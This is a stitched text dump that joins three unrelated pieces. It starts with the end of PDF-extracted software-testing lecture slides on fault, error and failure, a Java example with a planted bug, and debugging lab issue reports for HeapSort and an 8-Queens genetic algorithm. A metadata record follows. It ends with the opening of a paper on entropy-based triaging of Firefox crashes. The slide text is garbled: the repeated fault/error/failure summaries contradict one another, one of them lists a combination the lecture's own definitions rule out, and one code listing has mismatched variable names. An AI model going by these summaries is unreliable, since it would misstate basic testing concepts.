<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
</tbody>
</table>
Definition 2: Error – Fault – Failure
Could any of this happen?
<table>
<thead>
<tr>
<th>Fault</th>
<th>Error</th>
<th>Failure</th>
</tr>
</thead>
<tbody>
<tr>
<td>No</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td></td>
<td></td>
<td>or</td>
</tr>
<tr>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
or
Fault = Yes
Error = No
Failure = No
or
Failure = Yes
Definition 2: Error – Fault – Failure
New Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the index of the 1st occurrence of 0 in x
for (int i = 0; i < x.length-1; i++) {
if (x[i] == 0) {
return i;
}
}
return -1;
}
```
Inputs:
- Correct (=Expected) result? ?
- Actual result? ?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
New Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the index of the 1st occurrence of 0 in x
for (int i = 0; i < x.length-1; i++) {
if (x[i] == 0) {
return i;
}
}
return -1;
}
```
Inputs:
- Correct (=Expected) result? 0
- Actual result? 0
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
New Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the index of the 1st occurrence of 0 in x
for (int i = 0; i < x.length-1; i++) {
if (x[i] == 0) {
return i;
}
}
return -1;
}
```
Inputs:
- Correct (=Expected) result? 0
- Actual result? 0
- x = [0,7,2]
- Fault? Error? Failure? Yes / No / No
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Summary of the four possible situations:
Fault = No Fault = Yes Fault = Yes
Error = No Error = No Error = Yes
------------- ------------- ------------
Failure = No Failure = No Failure = Yes
or
Failure = No
Definition 2: Error – Fault – Failure
Summary of the four possible situations:
Fault = No
Error = No
Failure = No
Fault = Yes
Error = No
Failure = No
Fault = Yes
Error = Yes
Failure = No or Failure = No
Definition 2: Error – Fault – Failure
Summary of the four possible situations:
- Fault = No
- Error = No
- Failure = No
- Fault = Yes
- Error = No
- Failure = Yes
- Fault = Yes
- Error = Yes
No failure when testing does not imply an error!
Structure of Lecture 1
• Introduction and Motivation
• Course Information
• Basic Vocabulary
• Lab 1
Lab 1 – Debugging
System 1
- Issue 1
- Issue 2
- Issue 3
- Faults?
System 2
- Issue 1
- Issue 2
- Faults?
Use IntelliJ Debugger
Submission:
At 23:59 on day before next lab
Lab 1 – Debugging
- Thought process for setting breakpoints and deciding where to step in next to see the program state.
Starting Point: Issue Report
- Example Report
- Admin Data
- Short Description
- Reproduction Steps (input)
- Expected vs Actual Result
- Additional Information (screen shots, stack traces, etc.)
- Comments / Discussion
Issue Report – Sys_1: HeapSort
- Issue report 1:
Description:
The program should heapify any given list of positive integers but the resulting tree (and list) does not meet the max binary heap structure.
Input:
heapifying a list of integers - [1, 2, 5, 7, 6, 8, 11, 10, 3, 4, 9, 1, 0]
Input code:
```java
List<Integer> heapList = new ArrayList();
heapList.add(1);
heapList.add(2);
heapList.add(5);
heapList.add(7);
heapList.add(6);
heapList.add(8);
heapList.add(11);
heapList.add(10);
heapList.add(3);
heapList.add(4);
heapList.add(9);
heapList.add(1);
heapList.add(0);
System.out.println("List before heapifying:");
System.out.println(heapList);
Heap heap = new Heap(heapList);
System.out.println("After heapifying: ");
heap.printAsList();
heap.printAsTree();
System.out.println(heapList);
```
Expected output:
List before heapifying:
[1, 2, 5, 7, 6, 8, 11, 10, 3, 4, 9, 1, 0]
After heapifying:
[11, 10, 8, 7, 9, 1, 5, 2, 3, 4, 6, 1, 0]
Actual output:
List before heapifying:
[1, 2, 5, 7, 6, 8, 11, 10, 3, 4, 9, 1, 0]
After heapifying:
[11, 9, 5, 3, 9, 1, 6, 3, 4, 2, 1, 0]
# System 1: HeapSort – Build the Heap
<table>
<thead>
<tr>
<th>Heap</th>
<th>New element</th>
<th>Swap elements</th>
</tr>
</thead>
<tbody>
<tr>
<td>null</td>
<td>6</td>
<td></td>
</tr>
<tr>
<td>6</td>
<td>5</td>
<td></td>
</tr>
<tr>
<td>6, 5</td>
<td>3</td>
<td></td>
</tr>
<tr>
<td>6, 5, 3</td>
<td>1</td>
<td></td>
</tr>
<tr>
<td>6, 5, 3, 1</td>
<td>8</td>
<td></td>
</tr>
<tr>
<td>6, 5, 3, 1, 8</td>
<td>5, 8</td>
<td></td>
</tr>
<tr>
<td>6, 8, 3, 1, 5</td>
<td>6, 8</td>
<td></td>
</tr>
<tr>
<td>8, 6, 3, 1, 5</td>
<td>7</td>
<td></td>
</tr>
<tr>
<td>8, 6, 3, 1, 5, 7</td>
<td>7, 3</td>
<td></td>
</tr>
<tr>
<td>8, 6, 7, 1, 5, 3</td>
<td>2</td>
<td></td>
</tr>
<tr>
<td>8, 6, 7, 1, 5, 3, 2</td>
<td>4</td>
<td></td>
</tr>
<tr>
<td>8, 6, 7, 1, 5, 3, 2, 4</td>
<td>1, 4</td>
<td></td>
</tr>
</tbody>
</table>
List to be sorted in ascending order:
\[ [6 \ 5 \ 3 \ 1 \ 8 \ 7 \ 2 \ 4] \]
Heapified list:
\[ [8 \ 6 \ 7 \ 4 \ 5 \ 3 \ 2 \ 1] \]
## System 1: HeapSort – Sorting
<table>
<thead>
<tr>
<th>Heap</th>
<th>Swap elements</th>
<th>Delete element</th>
<th>Sorted array</th>
<th>Details</th>
</tr>
</thead>
<tbody>
<tr>
<td>8, 6, 7, 4, 5, 3, 2, 1</td>
<td>8, 1</td>
<td></td>
<td></td>
<td>Swap 8 and 1 to delete 8 from heap</td>
</tr>
<tr>
<td>1, 6, 7, 4, 5, 3, 2, 8</td>
<td></td>
<td>8</td>
<td></td>
<td>Delete 8 from heap & add to sorted array</td>
</tr>
<tr>
<td>1, 6, 7, 4, 5, 3, 2</td>
<td>1, 7</td>
<td></td>
<td>8</td>
<td>Swap 1 and 7 as they are not in order</td>
</tr>
<tr>
<td>7, 6, 1, 4, 5, 3, 2</td>
<td>1, 3</td>
<td></td>
<td>8</td>
<td>Swap 1 and 3 as they are not in order</td>
</tr>
<tr>
<td>7, 6, 3, 4, 5, 1, 2</td>
<td>7, 2</td>
<td></td>
<td>8</td>
<td>Swap 7 and 2 to delete 7 from heap</td>
</tr>
<tr>
<td>2, 6, 3, 4, 5, 1, 7</td>
<td></td>
<td>7</td>
<td>8</td>
<td>Delete 7 from heap & add to sorted array</td>
</tr>
<tr>
<td>2, 6, 3, 4, 5, 1</td>
<td>2, 6</td>
<td></td>
<td>7, 8</td>
<td>Swap 2 and 6 as they are not in order</td>
</tr>
<tr>
<td>…</td>
<td>…</td>
<td>…</td>
<td>…</td>
<td>…</td>
</tr>
</tbody>
</table>
### System 1: HeapSort – Sorting /1
<table>
<thead>
<tr>
<th>Heap</th>
<th>Swap elements</th>
<th>Delete element</th>
<th>Sorted array</th>
<th>Details</th>
</tr>
</thead>
<tbody>
<tr>
<td>3, 2, 1</td>
<td>3, 1</td>
<td></td>
<td>4, 5, 6, 7, 8</td>
<td>Swap 3 and 1 to delete 3 from heap</td>
</tr>
<tr>
<td>1, 2, 3</td>
<td></td>
<td>3</td>
<td>4, 5, 6, 7, 8</td>
<td>Delete 3 from heap & add to sorted array</td>
</tr>
<tr>
<td>1, 2</td>
<td>1, 2</td>
<td></td>
<td>3, 4, 5, 6, 7, 8</td>
<td>Swap 1 and 2 as they are not in order</td>
</tr>
<tr>
<td>2, 1</td>
<td>2, 1</td>
<td></td>
<td>3, 4, 5, 6, 7, 8</td>
<td>Swap 2 and 1 to delete 2 from heap</td>
</tr>
<tr>
<td>1, 2</td>
<td></td>
<td>2</td>
<td>3, 4, 5, 6, 7, 8</td>
<td>Delete 2 from heap & add to sorted array</td>
</tr>
<tr>
<td>1</td>
<td></td>
<td>1</td>
<td>2, 3, 4, 5, 6, 7, 8</td>
<td>Delete 1 from heap & add to sorted array</td>
</tr>
</tbody>
</table>
Completed: 1, 2, 3, 4, 5, 6, 7, 8
Issue Report 1– Sys_2: 8-Queens Problem
Issue report 1 (Hint: corresponds to 3 bugs)
Description:
When running the program, it should return a list of generations and the correct solution that it found. Instead, it throws an exception after 1000 generations.
Input:
Running the code with the population size of 100.
Input code:
Population pop = new Population(100);
runAlgorithm(pop);
Expected output:
Generation: 1 Current highest fitness: <?
Generation: 2 Current highest fitness: <?
... Found suitable board state on generation <?: <[x1,x2,x3,x4,x5,x6,x7,x8]>
Here is the found solution as a board where . marks an empty spot and, X marks a queen
<printout of 1 correct solution of 92 possible>
Actual output:
Generation: 1 Current highest fitness: 22
Generation: 2 Current highest fitness: 22
Generation: 3 Current highest fitness: 26
... Generation: 1000 Current highest fitness: 38
Issue Report 1 – Sys_2: 8-Queens Problem
- Issue report 1 (Hint: corresponds to 3 bugs)
Description:
When running the program, it should return a list of generations and the correct solution that it found. Instead, it throws an exception after 1000 generations.
Input:
Running the code with the population size of 100.
Input code:
```java
Population pop = new Population(100);
runAlgorithm(pop);
```
Expected output:
Generation: 1 Current highest fitness: <?>
Generation: 2 Current highest fitness: <?>
...
Found suitable board state on generation <?: <[x1,x2,x3>
Here is the found solution as a board where . marks an empty cell and x marks a cell where the queen is placed:
```plaintext
. . . . . . . .
. . . . . . . .
. . . . . . . .
. . . . . . . .
x . . . . . . .
. . . . . . . .
. . . . . . . .
. . . . . . . .
```
Actual output:
Generation: 1 Current highest fitness: 22
Generation: 2 Current highest fitness: 22
Generation: 3 Current highest fitness: 26
...
Generation: 1000 Current highest fitness: 38
Exception in thread "main" java.lang.Exception: Didn't find solution in 1000 generations
at Algorithm.generation(Algorithm.java:119)
at Algorithm.generation(Algorithm.java:129)
Comments:
This issue might not be reproducible line-to-line due to randomness in the algorithm, meaning the current highest fitness can vary. But the core of the issue is reproducible (exception).
Hints:
1. There are 3 bugs that correspond to this issue
2. You can consider this issue fixed only when all 3 bugs have been fixed. In order to be sure that you have fixed the correct bugs, run the program multiple times. The expected output may sometimes be seen because of the randomness of the data, make sure that the correct output appears every time you run the program.
3. While you have not yet fixed all the bugs, depending on the order in which you find and fix them, you might see any of the following output:
- The described exception is thrown.
- The program outputs a board state that it claims to be correct. However, the board state is not correct as all the queens are positioned in one single diagonal on the board.
- The program outputs a board state that it claims to be correct. However, the board state is not correct as there is at least one clash visible on the board.
Issue Report 2– Sys_2: 8-Queens Problem
- Issue report 2 (Hint: corresponds to 1 bug) (This issue appears after Issue 1 has been fixed)
Description:
Based on past projects using genetic algorithms, the average amount of generations should be less than 87 and the program should produce the correct output in less than 100 generations on at least 75% of the runs. However, the performance is much worse, the average amount of generations is over 100 and it only gets the solution in under 100 generations in less than 62% of the time. On very few runs, the program throws an exception of not finding a solution in under 1000 generations.
Input:
Calculated average amount of generations and percentage of runs where solution was found in under 100 generations with population size 100 and 1000 runs.
Input code:
```java
public static List<Integer> generationCounts = new ArrayList<>();
public static void main(String[] args) throws Exception {
for (int i = 0; i<1000; i++) {
pop = new Population(100);
generation(pop);
generationCounts.add(counter+1);
counter = 0;
}
System.out.println(calculateAverage(generationCounts));
System.out.println(calculatePercent(generationCounts));
generationCounts.removeAll(generationCounts);
}
```
Issue Report 2 – Sys_2: 8-Queens Problem
• Issue report 2 (Hint: corresponds to 1 bug) (This issue appears after Issue 1 has been fixed)
Description:
Based on past projects using genetic algorithms, the average amount of generations should be less than 87 and the program should produce the correct output in less than 100 generations on at least 75% of the runs. However, the performance is much worse, the average amount of generations is over 100 and it only gets the solution in under 100 generations in less than 62% of the time. On very few runs, the program throws an exception of not finding a solution in under 1000 generations.
Input:
Calculated average amount of generations and percentage in under 100 generations with population size 100.
Input code:
```java
public static List<Integer> generationCounts = new LinkedList<>();
public static void main(String[] args) throws Exception {
for (int i = 0; i < 1000; i++) {
gen = new Population(100);
generation(pop);
generationCounts.add(counter + 1);
counter = 0;
}
System.out.println(calculateAverage(generationCounts));
System.out.println(calculatePercent(generationCounts));
generationCounts.removeAll(generationCounts);
}
```
Expected output:
<table>
<thead>
<tr>
<th>Average generation count < 87</th>
</tr>
</thead>
<tbody>
<tr>
<td>P(generation count <=100) >75%</td>
</tr>
</tbody>
</table>
Actual output generalized and specific:
<table>
<thead>
<tr>
<th>Average generation count > 87</th>
</tr>
</thead>
<tbody>
<tr>
<td>P(generation count <=100) < 75%</td>
</tr>
</tbody>
</table>
Average generation count: 109.916
P(generation count <100): 57.7%
Comments and hints:
As performance can be affected by many things, the issue reporter has provided their own insight as a hint. You may use this, but don’t have to.
a) Genetic algorithms and their performance are strongly based on evaluations of states and fitness calculations.
b) It is important to check that the code does what the developer has intended it to do. To know what is intended, use Appendix A and helpful methods in the program (main class, the run<method_name>() methods)
Representation of Chess Board
5th row, 8th position
8th position = index 7
Genetic Algorithm
Genetic Algorithm
Size = 4
Fitness of first individual? +1 in the fitness function per each queen per each clash
Genetic Algorithm
Generate new population:
- Sort by fitness value
- Take upper half
- Then generate new board allocations based on allocation pairs in the upper half
Size = 4
Genetic Algorithm
Generate new population:
Size = 4
1 5 7 2 1 2 4 6
3 4 0 7 6 1 7 2
3 5 0 2 1 1 7 6
1 4 7 7 6 2 4 2
To Do & Next Week
• Quiz 1 (in Moodle!):
– Opens tomorrow morning – closes on Monday before noon!
• Lab 1:
– Debugging
• Lecture 2:
– Basic Black-Box and White-Box Testing Techniques (intro)
Next Week! Tue/Wed
|
{"Source-Url": "https://courses.cs.ut.ee/LTAT.05.006/2020_spring/uploads/Main/SWT2020_lecture01v04.pdf", "len_cl100k_base": 12102, "olmocr-version": "0.1.49", "pdf-total-pages": 92, "total-fallback-pages": 0, "total-input-tokens": 143117, "total-output-tokens": 15692, "length": "2e13", "weborganizer": {"__label__adult": 0.0005712509155273438, "__label__art_design": 0.0005536079406738281, "__label__crime_law": 0.0005326271057128906, "__label__education_jobs": 0.021759033203125, "__label__entertainment": 0.00014460086822509766, "__label__fashion_beauty": 0.0002846717834472656, "__label__finance_business": 0.0003294944763183594, "__label__food_dining": 0.0005078315734863281, "__label__games": 0.0018291473388671875, "__label__hardware": 0.0008192062377929688, "__label__health": 0.0004038810729980469, "__label__history": 0.0003893375396728515, "__label__home_hobbies": 0.0001621246337890625, "__label__industrial": 0.00042724609375, "__label__literature": 0.0006003379821777344, "__label__politics": 0.00035643577575683594, "__label__religion": 0.0006074905395507812, "__label__science_tech": 0.004642486572265625, "__label__social_life": 0.0002753734588623047, "__label__software": 0.006927490234375, "__label__software_dev": 0.95654296875, "__label__sports_fitness": 0.0005826950073242188, "__label__transportation": 0.0006604194641113281, "__label__travel": 0.0003216266632080078}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 41671, 0.03358]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 41671, 0.13711]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 41671, 0.80267]], "google_gemma-3-12b-it_contains_pii": [[0, 131, false], [131, 233, null], [233, 932, null], [932, 1083, null], [1083, 2470, null], [2470, 3103, null], [3103, 3659, null], [3659, 4122, null], [4122, 4148, null], [4148, 4256, null], [4256, 4997, null], [4997, 5043, null], [5043, 5417, null], [5417, 5479, null], [5479, 5531, null], [5531, 5604, null], [5604, 6076, null], [6076, 6460, null], [6460, 6491, null], [6491, 6691, null], [6691, 6878, null], [6878, 7080, null], [7080, 7146, null], [7146, 7583, null], [7583, 8184, null], [8184, 8479, null], [8479, 8646, null], [8646, 8769, null], [8769, 8843, null], [8843, 8897, null], [8897, 8999, null], [8999, 9690, null], [9690, 10730, null], [10730, 11768, null], [11768, 12691, null], [12691, 13637, null], [13637, 13691, null], [13691, 14054, null], [14054, 14495, null], [14495, 15389, null], [15389, 15469, null], [15469, 15729, null], [15729, 15831, null], [15831, 15851, null], [15851, 16155, null], [16155, 17353, null], [17353, 18080, null], [18080, 18413, null], [18413, 19033, null], [19033, 19056, null], [19056, 19327, null], [19327, 19473, null], [19473, 19961, null], [19961, 20314, null], [20314, 20814, null], [20814, 21304, null], [21304, 21812, null], [21812, 22376, null], [22376, 22874, null], [22874, 23373, null], [23373, 23888, null], [23888, 24577, null], [24577, 25090, null], [25090, 25588, null], [25588, 26086, null], [26086, 26216, null], [26216, 26751, null], [26751, 27047, null], [27047, 27536, null], [27536, 28026, null], [28026, 28523, null], [28523, 28842, null], [28842, 29061, null], [29061, 29306, null], [29306, 29408, null], [29408, 29588, null], [29588, 29710, null], [29710, 29943, null], [29943, 31100, null], [31100, 31944, null], [31944, 33193, null], [33193, 34312, null], [34312, 35214, null], [35214, 37592, null], [37592, 38877, null], [38877, 40946, null], [40946, 41022, null], [41022, 41040, null], [41040, 41155, null], [41155, 41333, null], [41333, 41452, null], [41452, 41671, null]], "google_gemma-3-12b-it_is_public_document": [[0, 131, true], [131, 233, null], [233, 932, null], [932, 1083, null], [1083, 2470, null], [2470, 3103, null], [3103, 3659, null], [3659, 4122, null], [4122, 4148, null], [4148, 4256, null], [4256, 4997, null], [4997, 5043, null], [5043, 5417, null], [5417, 5479, null], [5479, 5531, null], [5531, 5604, null], [5604, 6076, null], [6076, 6460, null], [6460, 6491, null], [6491, 6691, null], [6691, 6878, null], [6878, 7080, null], [7080, 7146, null], [7146, 7583, null], [7583, 8184, null], [8184, 8479, null], [8479, 8646, null], [8646, 8769, null], [8769, 8843, null], [8843, 8897, null], [8897, 8999, null], [8999, 9690, null], [9690, 10730, null], [10730, 11768, null], [11768, 12691, null], [12691, 13637, null], [13637, 13691, null], [13691, 14054, null], [14054, 14495, null], [14495, 15389, null], [15389, 15469, null], [15469, 15729, null], [15729, 15831, null], [15831, 15851, null], [15851, 16155, null], [16155, 17353, null], [17353, 18080, null], [18080, 18413, null], [18413, 19033, null], [19033, 19056, null], [19056, 19327, null], [19327, 19473, null], [19473, 19961, null], [19961, 20314, null], [20314, 20814, null], [20814, 21304, null], [21304, 21812, null], [21812, 22376, null], [22376, 22874, null], [22874, 23373, null], [23373, 23888, null], [23888, 24577, null], [24577, 25090, null], [25090, 25588, null], [25588, 26086, null], [26086, 26216, null], [26216, 26751, null], [26751, 27047, null], [27047, 27536, null], [27536, 28026, null], [28026, 28523, null], [28523, 28842, null], [28842, 29061, null], [29061, 29306, null], [29306, 29408, null], [29408, 29588, null], [29588, 29710, null], [29710, 29943, null], [29943, 31100, null], [31100, 31944, null], [31944, 33193, null], [33193, 34312, null], [34312, 35214, null], [35214, 37592, null], [37592, 38877, null], [38877, 40946, null], [40946, 41022, null], [41022, 41040, null], [41040, 41155, null], [41155, 41333, null], [41333, 41452, null], [41452, 41671, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 41671, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 41671, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 41671, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 41671, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 41671, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 41671, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 41671, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 41671, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 41671, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 41671, null]], "pdf_page_numbers": [[0, 131, 1], [131, 233, 2], [233, 932, 3], [932, 1083, 4], [1083, 2470, 5], [2470, 3103, 6], [3103, 3659, 7], [3659, 4122, 8], [4122, 4148, 9], [4148, 4256, 10], [4256, 4997, 11], [4997, 5043, 12], [5043, 5417, 13], [5417, 5479, 14], [5479, 5531, 15], [5531, 5604, 16], [5604, 6076, 17], [6076, 6460, 18], [6460, 6491, 19], [6491, 6691, 20], [6691, 6878, 21], [6878, 7080, 22], [7080, 7146, 23], [7146, 7583, 24], [7583, 8184, 25], [8184, 8479, 26], [8479, 8646, 27], [8646, 8769, 28], [8769, 8843, 29], [8843, 8897, 30], [8897, 8999, 31], [8999, 9690, 32], [9690, 10730, 33], [10730, 11768, 34], [11768, 12691, 35], [12691, 13637, 36], [13637, 13691, 37], [13691, 14054, 38], [14054, 14495, 39], [14495, 15389, 40], [15389, 15469, 41], [15469, 15729, 42], [15729, 15831, 43], [15831, 15851, 44], [15851, 16155, 45], [16155, 17353, 46], [17353, 18080, 47], [18080, 18413, 48], [18413, 19033, 49], [19033, 19056, 50], [19056, 19327, 51], [19327, 19473, 52], [19473, 19961, 53], [19961, 20314, 54], [20314, 20814, 55], [20814, 21304, 56], [21304, 21812, 57], [21812, 22376, 58], [22376, 22874, 59], [22874, 23373, 60], [23373, 23888, 61], [23888, 24577, 62], [24577, 25090, 63], [25090, 25588, 64], [25588, 26086, 65], [26086, 26216, 66], [26216, 26751, 67], [26751, 27047, 68], [27047, 27536, 69], [27536, 28026, 70], [28026, 28523, 71], [28523, 28842, 72], [28842, 29061, 73], [29061, 29306, 74], [29306, 29408, 75], [29408, 29588, 76], [29588, 29710, 77], [29710, 29943, 78], [29943, 31100, 79], [31100, 31944, 80], [31944, 33193, 81], [33193, 34312, 82], [34312, 35214, 83], [35214, 37592, 84], [37592, 38877, 85], [38877, 40946, 86], [40946, 41022, 87], [41022, 41040, 88], [41040, 41155, 89], [41155, 41333, 90], [41333, 41452, 91], [41452, 41671, 92]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 41671, 0.07378]]}
|
olmocr_science_pdfs
|
2024-11-24
|
2024-11-24
|
cf766d6bde9a46f1650076eb6887e4efc8d654be
|
An Entropy Evaluation Approach for Triaging Field Crashes: A Case Study of Mozilla Firefox
Foutse Khomh\textsuperscript{1}, Brian Chan\textsuperscript{1}, Ying Zou\textsuperscript{1}, Ahmed E. Hassan\textsuperscript{2}
\textsuperscript{1} Dept. of Elec. and Comp. Engineering, Queen’s University, Kingston, Ontario, Canada
\textsuperscript{2} School of Computing, Queen’s University, Kingston, Ontario, Canada
E-mail: \{foutse.khomh, 2byc, ying.zou\}@queensu.ca, ahmed@cs.queensu.ca
\textit{Abstract}—A crash is an unexpected termination of an application during normal execution. Crash reports record stack traces and run-time information once a crash occurs. A group of similar crash reports represents a crash-type. The triaging of crash-types is critical to shorten the development and maintenance process. Crash triaging process decides the priority of crash-types to be fixed. The decision typically depends on many factors, such as the impact of the crash-type, \textit{(i.e., its severity)}, the frequency of occurring, and the effort required to implement a fix for the crash-type. In this paper, we propose the use of entropy region graphs to triage crash-types. An entropy region graph captures the distribution of the occurrences of crash-types among the users of a system. We conduct an empirical study on crash reports and bugs, collected from 10 beta releases of Firefox 4. We show that our proposed triaging technique enables a better classification of crash-types than the current triaging used by Firefox teams. Developers and managers could use such a technique to prioritize crash-types during triage, to estimate developer workloads, and to decide which crash-types patches should be included in a next release.
\textit{Keywords}—Crash, bug, triaging, entropy region graphs.
I. INTRODUCTION
Software testing is the most widely used approach to detect bugs in software systems. It plays a central role in ensuring the quality and the success of a system. Nowadays, it is common to have built-in automatic crash reporting tools in software systems to collect crash reports directly from an end user’s machine. The Windows OS, Internet Explorer, and Mozilla Firefox are few names that make use of automatic collection of field crash reports. For example, whenever Firefox closes unexpectedly, Mozilla Cash Reporter collects information about the event and sends a detailed crash report to the Socorro crash report server. The collected crash reports include a stack trace of the failing thread and other information about the user’s environment to help developers replicate and fix the crash. A group of similar crash reports represents a crash-type. However, the built-in automatic crash reporting tools often collect a huge number of crash reports. For example, Firefox receives 2.5 million crash reports every day [1]. Triaging the collected crash-types is essential to allow developers and maintainers to focus their efforts more efficiently. During the triaging of crash-types, decisions are made about which crash-types should be fixed and when. These decisions typically depend on many factors, such as the impact of the crash-type \textit{(i.e., its severity)}, the crash-type frequency, the effort required to implement a fix for the crash-type, and the risk of attempting to fix the crash-type. Currently, Firefox developers triage crash-types based on the daily frequency of the occurrence of a crash-type. For the top crash-types \textit{(i.e., the crash-type with the maximum number of crash reports)}, Firefox developers file bugs in Bugzilla and link them to the corresponding crash-type in the Socorro server. Multiple bugs can be filed for a single crash-type and multiple crash-types can be associated with the same bug. The severity and priority of bugs are assigned manually by Mozilla triage teams, and are often modified later during the fixing process. Because bug classification depends on the personal judgment of triage team members, it is a subjective process and often results in resources being spent on non-essential issues [2]. Moreover, little estimation is provided to developers about the effort required to fix the crash-types and the risk of their attempts to fix the crash-types.
In this paper, we propose the use of crash entropy values to prioritize crash-types to fix during the triaging. More specifically, we propose the use of both entropy and frequency information during the triaging of a crash-type. The entropy of a crash-type quantifies the distribution of the occurrence of the crash-type to the users of the system. A high entropy value for a crash-type means that most users encountered that crash-type. The priority of such a crash-type should be raised by developers and quality managers. Currently, most triage teams sort crash-types based on frequency values, but do not consider the distribution of the crash-types among users. For example Firefox triage teams give an equal importance to the \textit{Taskbar tab preview} crash-type \textit{(i.e., \texttt{mozilla :: widget :: WindowHook :: Lookup(unsignedint)})} and the \textit{hang} crash-type \textit{(i.e., \texttt{hang}mozilla :: plugins :: PPluginInstanceParent :: CallNPP::destroy(short*)}) which have frequency values of 17,485 and 17,417 respectively. Yet the impact of the two crash-types on the users is very different since the \textit{Taskbar tab preview} crash-type affected only 7% of users
while 21% of users experienced the hang crash-type. A good triaging should assign different levels of importance to the two crash-types. The use of frequency alone is not enough to show the full impact of a crash-type on the users of a system. Moreover, although Firefox triage teams assigned the same level of priority to the two crash-types, it took them 10,464 hours to fix the Taskbar tab preview crash-type compared to only 1,152 hours for the hang crash-type. This large difference in fixing time could be explained by the fact that because few users experienced the Taskbar tab preview crash-type: only limited information was available for developers to replicate and test the correction. We believe that the information on the entropy of the two crash-types would have enabled a better triaging of the crash-types and a better assessment of the efforts needed to fix the crash-types.
In this paper, we propose a triaging technique based on the frequency and the entropy of crash-types. We conduct an empirical study on crash reports and bugs, collected from 10 beta releases of Firefox 4, and show that the new proposed triaging technique enables a better classification of crash-types than the current technique used by Firefox teams.
The rest of the paper is organized as follows. Section II describes the Mozilla crash triaging system, introduces the concept of crash-type entropy, and presents the proposed entropy based crash-type triaging approach. Section III describes the design of our case study and reports its results. Section IV discusses threats to the validity of our study. Section V discusses the related literature on triaging and entropy based analysis. Finally, Section VI concludes the paper and outlines future work.
II. CRASH-TYPE AND ENTROPY
A. Mozilla Crash Triaging System
Firefox is delivered with a built-in crash reporting tool: Mozilla Crash Reporter. Whenever Firefox closes unexpectedly, Mozilla Crash Reporter collects information about the event and sends a detailed crash report to the Socorro crash report server. The crash reports include a stack trace of the failing thread and other information about the user’s environment. A stack trace is an ordered set of frames. Each frame refers to a method signature and provides a link to the corresponding source code. Source code information is not always available in the frames; especially when a frame belongs to a third party binary. Figure 1 illustrates a sample crash report for Firefox.
Crash reports are sent to the Socorro crash report server [1]. The Socorro server assigns a unique id to each received report and groups the similar crash reports together. A group of similar crash reports is termed as a crash-type. The crash reports are grouped based on the top method signature of the stack trace. However, subsequent frames in the stack traces can vary for different crash reports in a crash-type. Figure 2 illustrates a sample crash-type. For each crash-type, the Socorro server provides a crash-type summary, a list of crash reports grouped under the crash-type and a set of bugs filed for the crash-type. Figure 2 shows the structure of the crash-type “UserCallWinProCheckWow” on the Socorro server.
The Socorro server provides a rich web interface for developers to analyze crash-types. Developers triage the crash-types by prioritizing the top crash-types (i.e., crash-type with the maximum number of crash reports) to analyze and fix the bugs responsible for the crash.
Mozilla uses Bugzilla for tracking bugs and maintains a bug report for each filed bug. For the most frequent crash-types (i.e., crash-type with the maximum numbers of crash reports), Firefox developers file new bugs in Bugzilla and link them to the corresponding crash-type in the Socorro server. Multiple bugs are sometimes linked to a single crash-type. Multiple crash-types can also link to the same bug. The Socorro server and Bugzilla are integrated, developers can directly navigate to the linked bugs from a crash-type summary in the Socorro server. Figure 3 presents a bird view of the Firefox crash triaging system.
Mozilla quality assurance teams triage bug reports and assign severity levels to the bugs [3]. When a developer fixes a bug, he or she often submits a patch to Bugzilla. A patch includes source code changes, test code and other configuration file changes. Once approved, the patch code is
B. Entropy of a Crash-type
In this study we apply the normalized Shannon’s entropy measure [4] to crash-types. We aim at capturing the distribution of a crash-type among the users of a system. We compute the entropy of a crash-type following Equation (1):
$$H_n(CT) = -\sum_{i=1}^{n} p_i \times \log_n(p_i)$$ \hspace{1cm} (1)
Where $CT$ is a crash-type; $p_i$ is the probability of a specific user $i$ reporting $CT$ ($p_i \geq 0$, and $\sum_{i=1}^{n} p_i = 1$); and $n$ is the total number of unique users of the system.
